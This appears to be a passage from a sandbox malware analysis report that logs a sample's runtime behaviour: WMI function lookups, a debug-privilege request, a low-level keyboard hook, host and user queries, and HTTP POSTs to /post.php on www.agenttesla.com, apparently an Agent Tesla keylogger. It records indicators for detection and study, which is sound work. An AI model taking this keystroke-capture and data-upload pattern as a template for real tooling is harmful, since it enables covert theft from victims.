Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Get, address_out = 0x6a311b96 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Put, address_out = 0x6a311b7a True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Delete, address_out = 0x6a311bb5 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Next, address_out = 0x6a311bf7 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x77af25dd True 1
Fn
User (2)
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (3)
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WindowsForms10.Window.0.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 2007967197 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 13112074 True 1
Fn
System (13)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 2
Fn
Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0xc8162a True 1
Fn
Get Info type = Operating System True 6
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Network Adapter Info - False 1
Fn
Get Network Adapter Info - True 1
Fn
Mutex (12)
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Fn
Create mutex_name = Global\.net clr networking False 1
Fn
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
Network Behavior
DNS (2)
Operation Additional Information Success Count Logfile
Resolve Name host = www.agenttesla.com, address_out = 46.166.182.114 True 1
Fn
Resolve Name host = survey-smiles.com, address_out = 127.0.0.1 True 1
Fn
TCP Sessions (4)
Information Value
Total Data Sent 0 bytes
Total Data Received 0 bytes
Contacted Host Count 2
Contacted Hosts 46.166.182.114, 127.0.0.1
TCP Session #1
Information Value
Remote Address 46.166.182.114
Remote Port 80
Local Address 192.168.0.53
Local Port 49159
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 287, size_out = 287 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
Information Value
Remote Address 127.0.0.1
Remote Port 80
Local Address 192.168.0.53
Local Port -
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Close type = SOCK_STREAM True 1
Fn
TCP Session #3
Information Value
Remote Address 46.166.182.114
Remote Port 80
Local Address 192.168.0.53
Local Port 49161
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 263, size_out = 263 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #4
Information Value
Remote Address 127.0.0.1
Remote Port 80
Local Address 192.168.0.53
Local Port -
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
HTTP Sessions (2)
Information Value
Total Data Sent 550 bytes
Total Data Received 734 bytes
Contacted Host Count 1
Contacted Hosts 46.166.182.114
HTTP Session #1
Information Value
User Agent Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Server Name www.agenttesla.com
Server Port 80
Username -
Password -
Data Sent 287 bytes
Data Received 367 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 181, Expect: 100-continue, Connection: Keep-Alive, url = www.agenttesla.com/post.php True 1
Fn
Data
Read Response size = 4096, size_out = 367 True 1
Fn
Data
Close Session - True 3
Fn
HTTP Session #2
Information Value
User Agent Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Server Name www.agenttesla.com
Server Port 80
Username -
Password -
Data Sent 263 bytes
Data Received 367 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 227, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Read Response size = 4096, size_out = 367 True 1
Fn
Data
Close Session - True 1
Fn